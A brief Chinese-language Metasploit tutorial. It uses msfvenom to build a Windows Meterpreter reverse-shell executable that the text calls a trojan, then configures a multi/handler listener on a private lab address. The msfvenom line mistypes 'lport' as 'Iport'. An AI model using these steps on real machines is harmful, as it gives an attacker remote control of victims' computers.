简介
Metasploit是一款开源的安全漏洞检测工具,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。它允许安全专业人员对计算机系统和网络应用程序进行渗透测试,并发现可能被攻击者利用的弱点。Metasploit通过模拟黑客攻击来检测和利用漏洞,测试系统和应用程序的安全性。
- 生成木马文件
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.100.128 Iport=8888 -f exe -o demo.exe
- 终端控制台进入
msfconsole
- 使用 exploit/multi/handler 模块
use exploit/multi/handler
- 设置攻击载荷设置
set payload windows/x64/meterpreter/reverse_tcp
- 设置 kali 地址
set lhost 192.168.100.128
- 设置端口
set lport 8888
- 运行
run